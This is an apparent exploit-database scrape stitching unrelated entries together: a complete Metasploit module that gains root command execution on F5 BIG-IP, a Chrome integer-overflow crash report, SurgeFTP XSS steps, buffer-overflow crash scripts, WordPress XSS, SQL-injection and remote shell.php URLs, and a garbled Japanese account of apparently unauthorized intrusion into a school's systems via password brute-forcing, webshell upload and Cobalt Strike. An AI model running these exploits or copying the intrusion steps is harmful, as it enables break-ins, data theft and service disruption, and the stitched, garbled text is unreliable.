[2] Horde Groupware - http://www.horde.org - Horde Groupware is a free, enterprise ready, browser based collaboration suite.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'nokogiri'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  SOAPENV_ENCODINGSTYLE = { "soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/" }
  STRING_ATTRS = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
  LONG_ATTRS = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' }

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'           => "F5 iControl iCall::Script Root Command Execution",
        'Description'    => %q{
          This module exploits an authenticated privilege escalation
          vulnerability in the iControl API on the F5 BIG-IP LTM (and likely
          other F5 devices). This requires valid credentials and the Resource
          Administrator role. The exploit should work on BIG-IP 11.3.0
          - 11.6.0, (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references
          for more details)
        },
        'License'        => MSF_LICENSE,
        'Author'         =>
          [
            'tom', # Discovery, Metasploit module
            'Jon Hart <jon_hart[at]rapid7.com>' # Metasploit module
          ],
        'References'     =>
          [
            ['CVE', '2015-3628'],
            ['URL', 'https://support.f5.com/kb/en-us/solutions/public/16000/700/sol16728.html'],
            ['URL', 'https://gdssecurity.squarespace.com/labs/2015/9/8/f5-icallscript-privilege-escalation-cve-2015-3628.html']
          ],
        'Platform'       => ['unix'],
        'Arch'           => ARCH_CMD,
        'Targets'        =>
          [
            ['F5 BIG-IP LTM 11.x', {}]
          ],
        'Privileged'     => true,
        'DisclosureDate' => "Sep 3 2015",
        'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(443),
        OptBool.new('SSL', [true, 'Use SSL', true]),
        OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/iControl/iControlPortal.cgi']),
        OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),
        OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin'])
      ])
    register_advanced_options(
      [
        OptInt.new('SESSION_WAIT', [ true, 'The max time to wait for a session, in seconds', 5 ]),
        OptString.new('PATH', [true, 'Filesystem path for the dropped payload', '/tmp']),
        OptString.new('FILENAME', [false, 'File name of the dropped payload, defaults to random']),
        OptInt.new('ARG_MAX', [true, 'Command line length limit', 131072])
      ])
  end

  def setup
    file = datastore['FILENAME']
    file ||= ".#{Rex::Text.rand_text_alphanumeric(16)}"
    @payload_path = ::File.join(datastore['PATH'], file)
    super
  end

  def build_xml
    builder = Nokogiri::XML::Builder.new do |xml|
      xml.Envelope do
        xml = xml_add_namespaces(xml)
        xml['soapenv'].Header
        xml['soapenv'].Body do
          yield xml
        end
      end
    end
    builder.to_xml
  end

  def xml_add_namespaces(xml)
    ns = xml.doc.root.add_namespace_definition("soapenv", "http://schemas.xmlsoap.org/soap/envelope/")
    xml.doc.root.namespace = ns
    xml.doc.root.add_namespace_definition("xsi", "http://www.w3.org/2001/XMLSchema-instance")
    xml.doc.root.add_namespace_definition("xsd", "http://www.w3.org/2001/XMLSchema")
    xml.doc.root.add_namespace_definition("scr", "urn:iControl:iCall/Script")
    xml.doc.root.add_namespace_definition("soapenc", "http://schemas.xmlsoap.org/soap/encoding")
    xml.doc.root.add_namespace_definition("per", "urn:iControl:iCall/PeriodicHandler")
    xml
  end

  def send_soap_request(pay)
    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path),
      'method' => 'POST',
      'data' => pay,
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD']
    )
    if res
      return res
    else
      vprint_error('No response')
    end
    false
  end

  def create_script(name, cmd)
    create_xml = build_xml do |xml|
      xml['scr'].create(SOAPENV_ENCODINGSTYLE) do
        xml.scripts(STRING_ATTRS) do
          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
          xml.item name
        end
        xml.definitions(STRING_ATTRS) do
          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
          xml.item cmd
        end
      end
    end
    send_soap_request(create_xml)
  end

  def delete_script(script_name)
    delete_xml = build_xml do |xml|
      xml['scr'].delete_script(SOAPENV_ENCODINGSTYLE) do
        xml.scripts(STRING_ATTRS) do
          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
          xml.item script_name
        end
      end
    end
    print_error("Error while cleaning up script #{script_name}") unless (res = send_soap_request(delete_xml))
    res
  end

  def script_exists?(script_name)
    exists_xml = build_xml do |xml|
      xml['scr'].get_list(SOAPENV_ENCODINGSTYLE)
    end
    res = send_soap_request(exists_xml)
    res && res.code == 200 && res.body =~ Regexp.new("/Common/#{script_name}")
  end

  def create_handler(handler_name, script_name)
    print_status("Creating trigger #{handler_name}")
    handler_xml = build_xml do |xml|
      xml['per'].create(SOAPENV_ENCODINGSTYLE) do
        xml.handlers(STRING_ATTRS) do
          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
          xml.item handler_name
        end
        xml.scripts(STRING_ATTRS) do
          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
          xml.item script_name
        end
        xml.intervals(LONG_ATTRS) do
          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
          # we set this to run once every 24h, but because there is no
          # start/end time it will run once, more or less immediately, and
          # again 24h from now, but by that point hopefully we will have
          # cleaned up and the handler/script/etc are gone
          xml.item 60 * 60 * 24
        end
      end
    end
    res = send_soap_request(handler_xml)
    if res
      if res.code == 200 && res.body =~ Regexp.new("iCall/PeriodicHandler")
        true
      else
        print_error("Trigger creation failed -- HTTP/#{res.proto} #{res.code} #{res.message}")
        false
      end
    else
      print_error("No response to trigger creation")
      false
    end
  end

  def delete_handler(handler_name)
    delete_xml = build_xml do |xml|
      xml['per'].delete_handler(SOAPENV_ENCODINGSTYLE) do
        xml.handlers(STRING_ATTRS) do
          xml.parent.namespace = xml.parent.parent.namespace_definitions.first
          xml.item handler_name
        end
      end
    end

    print_error("Error while cleaning up handler #{handler_name}") unless (res = send_soap_request(delete_xml))
    res
  end

  def handler_exists?(handler_name)
    handler_xml = build_xml do |xml|
      xml['per'].get_list(SOAPENV_ENCODINGSTYLE)
    end
    res = send_soap_request(handler_xml)
    res && res.code == 200 && res.body =~ Regexp.new("/Common/#{handler_name}")
  end

  def check
    # strategy: we'll send a create_script request, with empty name:
    # if everything is ok, the server return a 500 error saying it doesn't like empty names
    # XXX ignored at the moment: if the user doesn't have enough privileges, 500 error also is returned, but saying 'access denied'.
    # if the user/password is wrong, a 401 error is returned, the server might or might not be vulnerable
    # any other response is considered not vulnerable
    res = create_script('', '')
    if res && res.code == 500 && res.body =~ /path is empty/
      return Exploit::CheckCode::Appears
    elsif res && res.code == 401
      print_warning("HTTP/#{res.proto} #{res.code} #{res.message} -- incorrect USERNAME or PASSWORD?")
      return Exploit::CheckCode::Unknown
    else
      return Exploit::CheckCode::Safe
    end
  end

  def exploit
    # phase 1: create iCall script to create file with payload, execute it and remove it.
    shell_cmd = %(echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode >#{@payload_path}; chmod +x #{@payload_path};#{@payload_path})
    cmd = %(exec /bin/sh -c "#{shell_cmd}")

    arg_max = datastore['ARG_MAX']
    if shell_cmd.size > arg_max
      print_error "Payload #{datastore['PAYLOAD']} is too big, try a different payload "\
        "or increasing ARG_MAX (note that payloads bigger than the target's configured ARG_MAX value may fail to execute)"
      return false
    end

    script_name = "script-#{Rex::Text.rand_text_alphanumeric(16)}"
    print_status("Uploading payload script #{script_name}")
    unless (create_script_res = create_script(script_name, cmd))
      print_error("No response when uploading payload script")
      return false
    end
    unless create_script_res.code == 200
      print_error("Upload payload script failed -- HTTP/#{create_script_res.proto} "\
                  "#{create_script_res.code} #{create_script_res.message}")
      return false
    end
    unless script_exists?(script_name)
      print_error("Payload script uploaded successfully but script was not found")
      return false
    end
    register_file_for_cleanup @payload_path

    # phase 2: create iCall Handler, that will actually run the previously created script
    handler_name = "handler-#{Rex::Text.rand_text_alphanumeric(16)}"
    unless create_handler(handler_name, script_name)
      delete_script(script_name)
      return false
    end
    unless handler_exists?(handler_name)
      print_error("Trigger created successfully but was not found")
      delete_script(script_name)
      return false
    end
    print_status('Waiting for payload to execute...')

    # if our payload has not been successfully executed just yet, wait
    # until it does or give up
    slept = 0
    until session_created? || slept > datastore['SESSION_WAIT']
      Rex.sleep(1)
      slept += 1
    end

    print_status('Trying cleanup...')
    delete_script(script_name)
    delete_handler(handler_name)
  end
end
HireHackking 
Source: https://code.google.com/p/google-security-research/issues/detail?id=513

There's an integer overflow issue in sanity checking section lengths when parsing the vcdiff format (used in SDCH content encoding). This results in the parser parsing outside of sane memory bounds when parsing the contents of a vcdiff window - see attached crash PoC.

(/src/sdch/open-vcdiff/src/headerparser.cc)

bool VCDiffHeaderParser::ParseSectionLengths(
    bool has_checksum,
    size_t* add_and_run_data_length,
    size_t* instructions_and_sizes_length,
    size_t* addresses_length,
    VCDChecksum* checksum) {
  ParseSize("length of data for ADDs and RUNs", add_and_run_data_length); //     <---- user controlled
  ParseSize("length of instructions section", instructions_and_sizes_length); // <---- user controlled
  ParseSize("length of addresses for COPYs", addresses_length); //               <---- user controlled
  if (has_checksum) {
    ParseChecksum("Adler32 checksum value", checksum);
  }
  if (RESULT_SUCCESS != return_code_) {
    return false;
  }
  if (!delta_encoding_start_) {
    VCD_DFATAL << "Internal error: VCDiffHeaderParser::ParseSectionLengths "
                  "was called before ParseWindowLengths" << VCD_ENDL;
    return_code_ = RESULT_ERROR;
    return false;
  }
  const size_t delta_encoding_header_length =
      UnparsedData() - delta_encoding_start_;
  if (delta_encoding_length_ !=
          (delta_encoding_header_length +
           *add_and_run_data_length +
           *instructions_and_sizes_length +
           *addresses_length)) {  //                     <---- Integer overflow here (32-bit systems only)
    VCD_ERROR << "The length of the delta encoding does not match "
                 "the size of the header plus the sizes of the data sections"
              << VCD_ENDL;
    return_code_ = RESULT_ERROR;
    return false;
  }
  return true;
}

These returned lengths are subsequently used to initialise length-checked buffer objects for continuing the parsing (vcdecoder.cc:1024) 

size_t add_and_run_data_length = 0;
  size_t instructions_and_sizes_length = 0;
  size_t addresses_length = 0;
  if (!header_parser->ParseSectionLengths(has_checksum_,
                                          &add_and_run_data_length,
                                          &instructions_and_sizes_length,
                                          &addresses_length,
                                          &expected_checksum_)) {
    return header_parser->GetResult();
  }
  if (parent_->AllowInterleaved() &&
    // snip...
  } else {
    // If interleaved format is not used, then the whole window contents
    // must be available before decoding can begin.  If only part of
    // the current window is available, then report end of data
    // and re-parse the whole header when DecodeChunk() is called again.
    if (header_parser->UnparsedSize() < (add_and_run_data_length +
                                         instructions_and_sizes_length +
                                         addresses_length)) {
      return RESULT_END_OF_DATA;
    }
    data_for_add_and_run_.Init(header_parser->UnparsedData(),
                               add_and_run_data_length);
    instructions_and_sizes_.Init(data_for_add_and_run_.End(),
                                 instructions_and_sizes_length); 
    addresses_for_copy_.Init(instructions_and_sizes_.End(), addresses_length);

This issue only affects 32-bit builds, since ParseSize is parsing a positive int32_t; on 64-bit builds it cannot be large enough to wrap a size_t.

It's unclear if this is exploitable as a browser-process infoleak; the results of SDCH decoding will be returned to a renderer process, but the way that the returned values are used mean that it is likely that the process will have to survive reads at opposite ends of the address space, which *should* be guaranteed to crash with a 2:2 address space split. It is possible that on 32-bit Windows with a 1:3 address space split this can be survived, or with careful crafting of the input file these reads can be avoided; I've not investigated further at this point.

It appears to be necessary to host the PoC on a legitimate domain; as localhost is not supported for SDCH.

VERSION
Chrome Version: 47.0.2499.0
Operating System: Linux x86

REPRODUCTION CASE
Please include a demonstration of the security bug, such as an attached
HTML or binary file that reproduces the bug when loaded in Chrome. PLEASE
make the file as small as possible and remove any content not required to
demonstrate the bug.

FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: browser
Crash State: 

eax            0xf9ae8a78	-106001800
ecx            0xe7502d43	-414175933
edx            0x7b83e020	2072240160
ebx            0xf76597a0	-144336992
esp            0xe75025d0	0xe75025d0
ebp            0xe7502798	0xe7502798
esi            0x5	5
edi            0xf9061200	-117042688
eip            0xf1ddebee	0xf1ddebee <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+94>
eflags         0x210a93	[ CF AF SF IF OF RF ID ]
cs             0x23	35
ss             0x2b	43
ds             0x2b	43
es             0x2b	43
fs             0x0	0
gs             0x63	99

=> 0xf1ddebee <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+94>:	movzbl (%edx),%ecx
   0xf1ddebf1 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+97>:	mov    (%edi),%esi
   0xf1ddebf3 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+99>:	cmpb   $0x0,0x100(%esi,%ecx,1)
   0xf1ddebfb <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+107>:	je     0xf1ddec06 <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+118>
   0xf1ddebfd <open_vcdiff::VCDiffCodeTableReader::GetNextInstruction(int*, unsigned char*)+109>:	movsbl %cl,%edx

#0  open_vcdiff::VCDiffCodeTableReader::GetNextInstruction (this=0xf9061200, size=0x5, mode=0xf9ae8a78 " \340\203{Ox\a\376\001") at ../../sdch/open-vcdiff/src/decodetable.cc:78
#1  0xf1ddcab5 in open_vcdiff::VCDiffDeltaFileWindow::DecodeBody (this=0xf90611c4, parseable_chunk=<optimized out>) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1231
#2  0xf1ddbc8b in open_vcdiff::VCDiffDeltaFileWindow::DecodeWindow (this=0xf90611c4, parseable_chunk=0xe75031a8) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1359
#3  0xf1ddb6f0 in open_vcdiff::VCDiffStreamingDecoderImpl::DecodeChunk (this=0xf90611b0, data=<optimized out>, len=<optimized out>, output_string=0x8) at ../../sdch/open-vcdiff/src/vcdecoder.cc:887
#4  0xf1ddd499 in open_vcdiff::VCDiffStreamingDecoder::DecodeChunkToInterface (this=0x8b, data=0xe7503300 "8\026B\367\030'\317", <incomplete sequence \371\226>, len=3880792832, output_string=0xf76597a0 <_GLOBAL_OFFSET_TABLE_>) at ../../sdch/open-vcdiff/src/vcdecoder.cc:1393
#5  0xf1d2b17f in DecodeChunk<std::basic_string<char> > (this=0x7b83e020, data=<optimized out>, len=3880791363, output=<optimized out>) at ../../sdch/open-vcdiff/src/google/vcdecoder.h:83
#6  net::SdchFilter::ReadFilteredData (this=0xf9cf26e0, dest_buffer=0xd2ce0000 "", dest_len=<optimized out>) at ../../net/filter/sdch_filter.cc:424
#7  0xf1d28990 in net::Filter::ReadData (this=0xf9cf26e0, dest_buffer=0x7b83e020 <error: Cannot access memory at address 0x7b83e020>, dest_len=0xe75033c8) at ../../net/filter/filter.cc:131
#8  0xf1d2895c in net::Filter::ReadData (this=0xfd6b7c00, dest_buffer=<optimized out>, dest_len=0xe75033c8) at ../../net/filter/filter.cc:145
#9  0xf1ca8dde in net::URLRequestJob::ReadFilteredData (this=0xf9891a00, bytes_read=<optimized out>) at ../../net/url_request/url_request_job.cc:673
#10 0xf1ca8c1d in net::URLRequestJob::Read (this=0xf9891a00, buf=<optimized out>, buf_size=<optimized out>, bytes_read=0xe75034fc) at ../../net/url_request/url_request_job.cc:126

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38763.zip
HireHackking 
********************************************************************************************
# Exploit Netwin SurgeFTP Sever Stored Cross Site Scripting Vulnerabilities 
# Date: 11/18/2015
# Exploit Author: Un_N0n
# Vendor: NetWin
# Software Link: http://netwinsite.com/cgi-bin/keycgi.exe?cmd=download&product=surgeftp
# Version: 23d6
# Tested on: Windows 7 x64(64bit)
********************************************************************************************
[Info]

Surgeftp web-interface suffers with multiple Stored XSS vulnerabilities.

They are:

Stored XSS in 'Domain Name' field.

[How to?]
1. Open SurgeFTP web interface, Click on global option from the menu.
2. Add a new domain, in 'Domain Name' field, add in this(<img src=x onmouseover=alert(1)>) payload.
3. Save, then navigate to main page, hover mouse over 'broken image' in 'domains' section.

Stored XSS in 'Mirrors'.

[How to?]
1. Open surgeftp web interface, Click on 'Mirrors' option from the menu.
2. Click on Add Mirror, in 'Local path' & 'Remote Host' field add in this(<img src=x onmouseover=alert(1)>) payload.
3. Save, then navigate to 'Mirror' page again, Hover mouse over the 'broken image' in 'local path' & 'remote host' field.

Previously, Somebody else reported Stored XSS vulnerabilities in SurgeFTP.
Vendor tried to fix the previously reported XSS vulnerabilities by blacklisting only the <script>alert('blah')</script> payload
which is well not a good practice since i have triggered the same vulnerability by just entering different XSS payload,
therefore White-listing is the correct solution.
HireHackking 
#!/usr/bin/env python
# Exploit Title     : Sam Spade 1.14 Decode URL Buffer Overflow  Crash PoC
# Discovery by      : Vivek Mahajan - c3p70r
# Discovery Date    : 19/11/2015
# Vendor Homepage   : http://samspade.org
# Software Link     : http://www.majorgeeks.com/files/details/sam_spade.html
# Tested Version    : 1.14
# Vulnerability Type: Denial of Service / Proof Of Concept/ Memory Overwrite
# Tested On     : Windows XP SP2 ,Windows 7 SP1 x64, Windows 8.1 x64 PRO, Windows 10 x64
# Crash Point   : Go to Tools > Decode URL> Enter the contents of 'spade.txt' > OK , Note: Do Remove the http://



buffer = "A"*510

file = open("spade.txt, 'w')
file.write(buffer)
file.close()
            

# Follow on twitter @vik.create
HireHackking 
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title     : SuperScan 4.1 Windows Enumeration Hostname/IP/URL Field SEH Overflow Crash PoC
# Discovery by      : Luis Martínez
# Email		    : l4m5@hotmail.com
# Discovery Date    : 18/11/2015
# Vendor Homepage   : http://www.foundstone.com
# Software Link     : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
# Tested Version    : 4.1
# Vulnerability Type    : Denial of Service (DoS) Local
# Tested on OS      : Windows XP Professional SP3 x86 es
# Steps to Produce the Crash: 
# 1.- Run python code : python super_scan_4.1_windows_enumeration.py
# 2.- Open super_scan_4.1_windows_enumeration.txt and copy content to clipboard
# 3.- Open SuperScan4.1.exe
# 4.- Paste Clipboard Windows Enumeration > Hostname/IP/URL
# 5.- Clic on button -> Enumerate
# 6.- Crashed
##########################################################################################
#  -----------------------------------NOTES----------------------------------------------#
##########################################################################################
# After the execution of POC, the SEH chain looks like this: 
# 00E3FF98 43434343
# 42424242 *** CORRUPT ENTRY ***
  
# And the Stack
  
#00E3FF88   41414141  AAAA
#00E3FF8C   41414141  AAAA
#00E3FF90   41414141  AAAA
#00E3FF94   41414141  AAAA
#00E3FF98   42424242  BBBB  Pointer to next SEH record
#00E3FF9C   43434343  CCCC  SE handler

# And the Registers
  
#EAX 00000001
#ECX 00000001
#EDX 7C91E514 ntdll.KiFastSystemCallRet
#EBX 00A028E8
#ESP 00E3FF58 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC"
#EBP 41414141
#ESI 00473774 SuperSca.00473774
#EDI 00000000
#EIP 41414141

buffer = "\x41" * 328
nseh = "\x42" * 4
seh = "\x43" * 4

f = open ("super_scan_4.1_windows_enumeration.txt", "w")
f.write(buffer + nseh + seh)
f.close()
HireHackking 
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title     : SuperScan 4.1 Tools Hostname/IP/URL Field Buffer Overflow Crash PoC
# Discovery by      : Luis Martínez
# Email		    : l4m5@hotmail.com
# Discovery Date    : 18/11/2015
# Vendor Homepage   : http://www.foundstone.com
# Software Link     : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
# Tested Version    : 4.1
# Vulnerability Type    : Denial of Service (DoS) Local
# Tested on OS      : Windows XP Professional SP3 x86 es
# Steps to Produce the Crash: 
# 1.- Run python code : python super_scan_4.1_tools.py
# 2.- Open super_scan_4.1_tools.txt and copy content to clipboard
# 3.- Open SuperScan4.1.exe
# 4.- Paste Clipboard Tools > Hostname/IP/URL
# 5.- Clic on button -> Whois
# 6.- Crashed

buffer = "\x41" * 280
eip = "\x42" * 4

f = open ("super_scan_4.1_tools.txt", "w")
f.write(buffer + eip)
f.close()
HireHackking 
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title     : SuperScan 4.1 Scan Hostname/IP Field Buffer Overflow Crash PoC
# Discovery by      : Luis Martínez
# Email		    : l4m5@hotmail.com
# Discovery Date    : 18/11/2015
# Vendor Homepage   : http://www.foundstone.com
# Software Link     : http://www.mcafee.com/us/downloads/free-tools/superscan.aspx
# Tested Version    : 4.1
# Vulnerability Type    : Denial of Service (DoS) Local
# Tested on OS      : Windows XP Professional SP3 x86 es
# Steps to Produce the Crash: 
# 1.- Run python code : python super_scan_4.1.py
# 2.- Open super_scan_4.1.txt and copy content to clipboard
# 3.- Open SuperScan4.1.exe
# 4.- Paste Clipboard Scan > Hostname/IP
# 5.- Clic on add button (->)
# 6.- Crashed

buffer = "\x41" * 636
eip = "\x42" * 4

f = open ("super_scan_4.1.txt", "w")
f.write(buffer + eip)
f.close()
HireHackking 
source: https://www.securityfocus.com/bid/62459/info

The RokStories plugin for WordPress is prone to multiple security vulnerabilities, including:

1. An arbitrary file-upload vulnerability
2. A cross-site scripting vulnerability
3. An information-disclosure vulnerability
4. A denial-of-service vulnerability

Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, perform a denial-of-service attack, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

RokStories 1.25 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-content/plugins/wp_rokstories/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

http://www.example.com/wp-content/plugins/wp_rokstories/thumb.php?src=http://

http://www.example.com/wp-content/plugins/wp_rokstories/thumb.php?src=http://www.example.com/big_file&h=1&w=1

http://www.example.com/wp-content/plugins/wp_rokstories/thumb.php?src=http://www.example2.com/shell.php
HireHackking 
source: https://www.securityfocus.com/bid/62458/info

The RokNewsPager plugin for WordPress is prone to multiple security vulnerabilities, including:

1. An information-disclosure vulnerability
2. A cross-site scripting vulnerability
3. An arbitrary file-upload vulnerability
4. A denial-of-service vulnerability

Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, perform a denial-of-service attack, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=http://
http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=http://www.example.com/big_file&h=1&w=1
http://www.example.com/wp-content/plugins/wp_roknewspager/thumb.php?src=http://www.example2.com/shell.php
HireHackking 
source: https://www.securityfocus.com/bid/62438/info

mukioplayer4wp for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

mukioplayer4wp 1.6 is vulnerable; other versions may also be affected. 

http://www.example.com/videos/wp-content/plugins/mukioplayer-for-wordpress/php-scripts/get.php?cid=71866877%27
HireHackking 
source: https://www.securityfocus.com/bid/62313/info

eTransfer Lite is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and control how the site is rendered to the user; other attacks are also possible.

eTransfer Lite 1.0 is vulnerable; other versions may also be affected. 

<bq>The following files are hosted live from the iPad's Docs folder.</bq><p><b>Images:<br><br></b>
<a href="http://www.example.com/%3C[PERSISTENT INJECTED SCRIPT CODE!]%3Es2.png"><[PERSISTENT INJECTED SCRIPT 
CODE!]">s2.png</a>
(    51.8 Kb, 2013-08-25 02:09:25 +0000)<br />
<a href="a2b642e7de.jpg">a2b642e7de.jpg</a>
(   238.0 Kb, 2013-08-25 02:08:13 +0000)<br />
</p><br><br><br><hr><br><br><br><center><form
 action="" method="post" enctype="multipart/form-data" name="form1" 
id="form1"><label>Upload file to iPad  <input type="file" 
name="file" id="file" /></label><label> <input 
type="submit" name="button" id="button" value="Submit" 
/></label></form></center><br><br><br>Powered
 By <a 
href=http://www.example.com</a></body></html></iframe></a></p></body></html>
HireHackking

0x01はじめに

流行により、学校のYibanアプリはチェックインシステムを追加しました。これには、毎日朝の検査と午後の検査が必要です。忘れてしまうと、レビューする何千もの単語があります。

私はこの「形式主義」に深く不満を感じています。私はたまたまサイバーセキュリティチームを設立したので、それを操作する準備をしました。

0x02スポット

基本情報収集についてはあまり言いません

したがって、異なるシステムは複数のサーバーを使用します

それは完全に解決できないようです。コアシステムを獲得するには、さまざまなシステムとサーバーの素晴らしい学校システムの浸透の旅が必要です。

次に、コアシステムにタッチします

まず、「Yiban」システムのホームページを開き、これがどのように見えるかです

1049983-20220106104200012-153190839.jpg

開発者がTPフレームワークを使用し、さまざまなTP注射をテストしたことを確認することは難しくありません。

RCEのペイロードは失敗に終わりました、そして、安全性の認識はそれほど悪くないようです

ドメイン名の下のホームページは、機能的なポイントや情報なしで完全にエラー報告ページです

saying sayingにあるように、情報収集の品質は浸透の成功または失敗を直接決定するので、私たちは決して不注意であってはなりません。

最初にファズの第1レベルのディレクトリに来てみましょう

Image

結果は非常に優れており、多くのカタログと機能ポイントがあります。

次に、各第1レベルのディレクトリのセカンダリディレクトリを曖昧にし続け、ドメイン名の下に展開されている機能ポイントを常に探求しました。

第1レベルのディレクトリが多すぎるため、詳細については写真には行きません。

機能的なポイントを理解した後、ズボンを脱いで乾燥を開始します

0x03メンタルヘルスシステムの浸透(IISショートファイル名ポートポート - ブラストニューログインポートアプロード)

第1レベルのカタログを爆破し、爆破します

http://xxx.xxx.edu.cn/psyこのパス

心理教育の健康システムが展開され、ミドルウェアがIISであることがわかった

ただし、メンタルヘルスシステムのログインには検証コードメカニズムがあり、検証コードを識別するのは簡単ではありません

Image

私はすぐにIISショートファイル名機能について考えました

次に、IISショートファイル名ディレクトリスキャンツールを使用します

(https://github.com/lijiejie/iis_shortname_scanner)スキャン用

Image

他のシステムの古いログインポートを取得します

http://xxx.xxx.edu.cn/psy/login2.aspx

Image

図に示されているように、検証コードメカニズムはありません

直接げっぷクラスター爆弾型爆発

他のシステムの弱いパスワード管理者AA123456を正常に取得しました

ただし、古いシステムの他のページが削除されており、通常はバックグラウンドにログインできません

Image

しかし、古いシステムと新しいシステムで使用されているのと同じデータベースが推測されています

新しいシステムへのアクセス

http://xxx.xxx.edu.cn/psy/login.aspx

パスワード管理者、AA123456を使用して、正常にログインします

Image

バックグラウンドでアップロードポイントを検索します

Image

アップロードポイントはです

http://xxx.xxx.edu.cn/psy/scalemanage/scaleedit.aspx?scalelistid=1

スケールプラットフォームに追加されたトピックは、任意のファイルにアップロードされます

(そうです、このアップロードポイント.それは非常に隠されていると言えます.それを見つけるのに長い時間がかかりました)

Image

ASPXのアップロードは不可解にジャンプします。 ASPは解析せず、ASMX馬を直接通過します。

AWVS 10のデバッグモジュールを介してコマンドを実行します

Image

許可はネットサービスです

CobaltStrikeを使用して、PowerShellを直接POWERSHELLに移動します

Image

パッチは死んでいるようです。

さまざまな地元の権利昇進が一度開始されましたが、役に立たなかった

comコンポーネントは、ジャガイモが装着された後も育てることさえできません。最初にこれをしましょう。右を上げる場合は、追加してください。

メンタルヘルスシステムは、初期の買収を発表しました

0x04ライブブロードキャストシステムインターフェイスインジェクション

ライブブロードキャストシステムに入った後、使用する意味がなく、開発はまだ完了していないことがわかりました。

Image

しかし、げっぷで、私はajaxインターフェイスのリクエストを見つけました、

HTTPリクエストは次のように:です

post /index.php/live/index/seat_ajax.html http/1.1

host: xxx.xxx.edu.cn

Content-Length: 24

Accept:/

Origin:http://xxx.xxx.edu.cn

X-Requested With: xmlhttprequest

user-agent: mozilla/5.0(linux; u; android 5.1; zh-cn; 1501_m02 build/lmy47d)applewebkit/534.30(khtml、ygecko)バージョン/4.0 ucbrowser/11.0.0.0.818 U3/0.8.0モバイルSaf/534.30

Content-Type:アプリケーション/x-www-form-urlencoded; charset=utf-8

Referer:http://xxx.xxx.edu.cn/index.php/live/index/seat?place_id=10active_id=20

Accept-Encoding: gzip、deflate

Accept-Language: ZH-CN、ZH; Q=0.9、EN; Q=0.8

Cookie3360 ASP.NET_SESSIONID=S0CLWRGINZ0RW3X0SMTWTSGG; phpsessid=7985bf0a5f38e5922a651ac1f4ef9b1a; phpsessid=7985bf0a5f38e5922a651ac1f4ef9b1a

Connection:閉じます

place_id=10active_id=20

Image

sqliペイロードを見つけるためにファズをします

